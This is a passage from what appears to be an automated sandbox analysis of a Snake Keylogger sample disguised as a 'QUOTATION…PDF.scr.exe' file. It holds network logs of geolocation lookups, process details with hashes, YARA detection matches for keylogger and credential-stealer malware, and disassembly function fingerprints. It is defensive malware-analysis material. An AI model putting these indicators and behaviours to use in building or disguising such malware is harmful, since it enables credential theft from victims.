2024-10-28 12:48:08 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49814	188.114.96.3	443	6012	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 12:48:09 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 12:48:09 UTC	879	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 12:48:09 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 42320 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4FD95uAMLjLIYhJ3CllXWAO8pnfIdlppTgonqnyCVlVC9MnDL%2B9IM31tHQgmkWT900SKJBtUhljHl0ylPENhzOFhXpPb3DrAkyUMJR3jYDc1HJyGBm1HFI%2BQxDYuU53HMvAqeDRs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b09dbbe403ab5-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1093&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2632727&cwnd=37&unsent_bytes=0&cid=95a631ecc60f2b00&ts=162&x=0"
2024-10-28 12:48:09 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49826	188.114.96.3	443	6012	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 12:48:10 UTC	63	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-28 12:48:11 UTC	880	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 12:48:10 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 42321 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TAIuZfYb6lsQhszXkPocbdy20fcAKHGDuv7iNG2MCCDf25HSs3vNGsETCIvP1f89JoTQlxeUiI5CEEu0dJ%2B8qJnsIJP4F3fUIRw1UF4B1ig84FnJ7Y4998xux2ETM9x%2BFRZTD6gz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b09e4abfce926-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1385&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2035137&cwnd=245&unsent_bytes=0&cid=8f5faeca711cf0cb&ts=154&x=0"
2024-10-28 12:48:11 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49835	188.114.96.3	443	6012	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 12:48:12 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 12:48:12 UTC	880	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 12:48:12 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 42323 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U9GOnGwWdr1vCkVyHdPUlIpAtSWAfMF42iRPYMZ5GjyfvzVbFTJwut4YrJ1ktJ4QCf24mjt2xRSu33oCeeqOXBuR6pC9EelG%2Fl1VkTu5oqzWWDCWRzkdxhenvcdEVNNF3rdwXOj%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b09ed9b522cd9-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1401&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1968728&cwnd=246&unsent_bytes=0&cid=7f1ebf3782013992&ts=161&x=0"
2024-10-28 12:48:12 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49845	188.114.96.3	443	6012	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 12:48:13 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 12:48:13 UTC	886	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 12:48:13 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 42324 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kPuyEQ5WkGheCN2bo4nHftQuIu%2FHh6EJCBLhkIk3oMfuBx07pNXxIg2OfNBJOwOeKWPpdXnvr7B5j%2BOu%2BBZSevqocTgoTws%2BzLlGVDD8CdzgKwrwGdek%2Bosg1oZADIKMizl8B672"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b09f69bb34680-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1878&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1577342&cwnd=251&unsent_bytes=0&cid=7399b53db8997f0f&ts=157&x=0"
2024-10-28 12:48:13 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Target ID:	0
Start time:	08:46:58
Start date:	28/10/2024
Path:	C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe"
Imagebase:	0x2c7a57f0000
File size:	94'720 bytes
MD5 hash:	5AB07A2800291BD5CABC6CCAEF82E20B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2328766008.000002C7B801D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2335523965.000002C7C0000000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2316760953.000002C7A79E2000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2328766008.000002C7B7BE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2316760953.000002C7A779B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:48:01
Start date:	28/10/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0x2c618fa0000
File size:	55'824 bytes
MD5 hash:	DF5419B32657D2896514B6A1D041FE08
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2950884480.000002C61AF69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000004.00000002.2949416019.000002C619020000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2953399954.000002C62AD29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.2953399954.000002C62AD29000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.2953399954.000002C62AD29000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2950884480.000002C61AD21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	08:48:01
Start date:	28/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Function 00007FFD9BA00A48 Relevance: 2.2, Instructions: 2205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a080585347a85b14f065f6873124a174d8650a2869c985f6f42ecb349a4b062
Instruction ID: ff3bc53bcead18c5a0f2e7d8e13135d69d1366edecf2ef347db206ce0f07f8fb
Opcode Fuzzy Hash: 9a080585347a85b14f065f6873124a174d8650a2869c985f6f42ecb349a4b062
Instruction Fuzzy Hash: 74F2E170A09A4D8FDBA4DF68C4A4BA977E1FF5A304F1540B9D08DD72A2DA35ED81CB40

Function 00007FFD9BA15A2D Relevance: 1.3, Instructions: 1317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de05b5b99ef4b8d837723336905a7805d77dd8e26eaa19e268d9a2e4a0ea8906
Instruction ID: a32a38b3e50e9cd52787ebf954a13de9211bf4cfe44e6b37516599cf93442213
Opcode Fuzzy Hash: de05b5b99ef4b8d837723336905a7805d77dd8e26eaa19e268d9a2e4a0ea8906
Instruction Fuzzy Hash: 9D823730B1DA4E4FE7B99B6C88742B977D1EF94310B1941BED05AC32E6DE68E942C740

Function 00007FFD9BA086B9 Relevance: .9, Instructions: 882COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f96bcf08a748faf25b60d189b0bf2c10ff4851100bd9f37b11841130d9a2e6e
Instruction ID: 46101a954b54edd71ac929b82c875ccd57b88440c31f595a7bfb1354c7079bca
Opcode Fuzzy Hash: 7f96bcf08a748faf25b60d189b0bf2c10ff4851100bd9f37b11841130d9a2e6e
Instruction Fuzzy Hash: 46520431B1AF0E4FDBA8DB68846567973E1FFA9310F010579D48EC32A2DF68B9418781

Function 00007FFD9BA0D5F2 Relevance: 4.1, Strings: 3, Instructions: 377COMMON

Download Yara Rule

Strings

n+_^, xrefs: 00007FFD9BA0D601
@, xrefs: 00007FFD9BA0DB97
t+_^, xrefs: 00007FFD9BA0DBFB

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID: @$n+_^$t+_^
API String ID: 0-1007855756
Opcode ID: 097ca7a8be7f80e1ce51e06d811e5f35bb005bc2c3cd0e1dc38958c3038774d2
Instruction ID: de47d2f6d8c4939f4e2d2499674378afa5f0c4afac5e18d9ca96a1301f598c08
Opcode Fuzzy Hash: 097ca7a8be7f80e1ce51e06d811e5f35bb005bc2c3cd0e1dc38958c3038774d2
Instruction Fuzzy Hash: 9EB11732B0E74E4FE7749B68946527977D1EF47310F05027AD8CDC72A2DEA8A9428382

Function 00007FFD9BA05380 Relevance: 1.9, Strings: 1, Instructions: 639COMMON

Download Yara Rule

Strings

+_H, xrefs: 00007FFD9BA057EF

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID: +_H
API String ID: 0-1516445774
Opcode ID: 89ed3bdeaf24e6ee2a00055538f6991cafe0fa50553664a94e7bbb8f52318c02
Instruction ID: 7fab3a478c27968bb4e1f199215ed2d7e26b75fb359ab7cf1b195154c128c439
Opcode Fuzzy Hash: 89ed3bdeaf24e6ee2a00055538f6991cafe0fa50553664a94e7bbb8f52318c02
Instruction Fuzzy Hash: 9E12913071990D4FDBA8EF5CD8A9B7937D1EF5A311F0500B9E48EC72A6DE64AC418741

Function 00007FFD9BA05446 Relevance: 1.9, Strings: 1, Instructions: 627COMMON

Download Yara Rule

Strings

+_H, xrefs: 00007FFD9BA057EF

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID: +_H
API String ID: 0-1516445774
Opcode ID: a4cff2b94aff94203fe2ccb0f9d7f4aa10c308119c934c52eb3626e3e7ddd27c
Instruction ID: 5e9d5fd609a0d205868dd10929b4cdc4ef20f4f2844fbabfb36939ec6b02857e
Opcode Fuzzy Hash: a4cff2b94aff94203fe2ccb0f9d7f4aa10c308119c934c52eb3626e3e7ddd27c
Instruction Fuzzy Hash: 4002803071990D4FDB98EF5C98A9B7837D1EF9A311F0601B9E48EC72A6DE64EC428741

Function 00007FFD9BA07FE1 Relevance: 1.9, Strings: 1, Instructions: 614COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9BA082B9

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: ee9d9c9155d358ee2cf03f15cf0cbfa0accb5cdffcf2f1a563b20898201adf36
Instruction ID: 218f4d061505420a6257ea9e8171193ee5870acbf5d9e1b921a4c0dfac7dbd86
Opcode Fuzzy Hash: ee9d9c9155d358ee2cf03f15cf0cbfa0accb5cdffcf2f1a563b20898201adf36
Instruction Fuzzy Hash: C9022030A0EA4A8FD768DF5888A557573E1FF9A320F1541BED489C72A7DE24EC42C781

Function 00007FFD9B822890 Relevance: 1.7, Strings: 1, Instructions: 496COMMON

Download Yara Rule

Strings

J_H, xrefs: 00007FFD9B82324D

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID: J_H
API String ID: 0-1993391959
Opcode ID: 632b12243814f5edce48d396f58d3e2772184e0783ad89723f3090a814fad7cb
Instruction ID: 505985915839397d380cfa41738fc49d1e6d1b2ea7c6904dee5ba735cdba7d3c
Opcode Fuzzy Hash: 632b12243814f5edce48d396f58d3e2772184e0783ad89723f3090a814fad7cb
Instruction Fuzzy Hash: C0128870A19A1D8FDBA9DF18C895BA9B7B5FB59301F1041E9D00DE72A5DB34AE81CF00

Function 00007FFD9B963ABD Relevance: 1.7, Strings: 1, Instructions: 489COMMON

Download Yara Rule

Strings

5_H, xrefs: 00007FFD9B963FEF

Memory Dump Source

Source File: 00000000.00000002.2338487089.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID: 5_H
API String ID: 0-1289465396
Opcode ID: 5727e0634310001058b3d4408b3f225d2ed7344af672fdde3eff11cf67030d80
Instruction ID: 5612fc927b8f492a1ce869c817016f3ee3a3fd937df51347cf56e35b32818b20
Opcode Fuzzy Hash: 5727e0634310001058b3d4408b3f225d2ed7344af672fdde3eff11cf67030d80
Instruction Fuzzy Hash: F7021970E1A61EDFEBA5DBA884657F977B1FF59301F510079D009932A2CB396A82CB40

Function 00007FFD9BA0B000 Relevance: 1.7, Strings: 1, Instructions: 472COMMON

Download Yara Rule

Strings

o6_H, xrefs: 00007FFD9BA0B4D2

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID: o6_H
API String ID: 0-667101522
Opcode ID: e458f57012dcba09aab18f74935b2981b20311a2598eb484e79cf75b94781dcf
Instruction ID: 5a9cfc29ec97f6a3a6ca0bdf477db38410f3e9f4370f163b75e3151c0669dc28
Opcode Fuzzy Hash: e458f57012dcba09aab18f74935b2981b20311a2598eb484e79cf75b94781dcf
Instruction Fuzzy Hash: 10F1AF3171994D8FDBA8EF68C4A5AA977E1FF69300F5101A9E44DC72A6CE35EC42C780

Function 00007FFD9B80CAFC Relevance: 1.3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

Strings

yK_^, xrefs: 00007FFD9B80CB01

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID: yK_^
API String ID: 0-4199313219
Opcode ID: 78f3d52fafe53c3c4e0fa537e169df51eb7913da21757a8d0146286cfd33a5dc
Instruction ID: 3b01a36af1362a77e9081892b49283ab9a1bdb2d23d5f081857c8147b0c5236d
Opcode Fuzzy Hash: 78f3d52fafe53c3c4e0fa537e169df51eb7913da21757a8d0146286cfd33a5dc
Instruction Fuzzy Hash: 4F110970908A4E9FDF94EF98C899AEA7BF0FF2C304F01056AA419D7261DB30A550CB81

Function 00007FFD9BA0C3F3 Relevance: .9, Instructions: 907COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f919b8e6a0b12777480c3e2a71fed838d5c25c6bf26ab309a9308dc4339de60
Instruction ID: dc3e5e24163464dba9d905e532891cc731e0da205571c257fdddee8450077cf2
Opcode Fuzzy Hash: 4f919b8e6a0b12777480c3e2a71fed838d5c25c6bf26ab309a9308dc4339de60
Instruction Fuzzy Hash: BB52C031B18A4E8FDB98DF18C4A57B973E1FF99304F140169E49AC3296DE38E942C781

Function 00007FFD9BA10586 Relevance: .8, Instructions: 811COMMON

Download Yara Rule

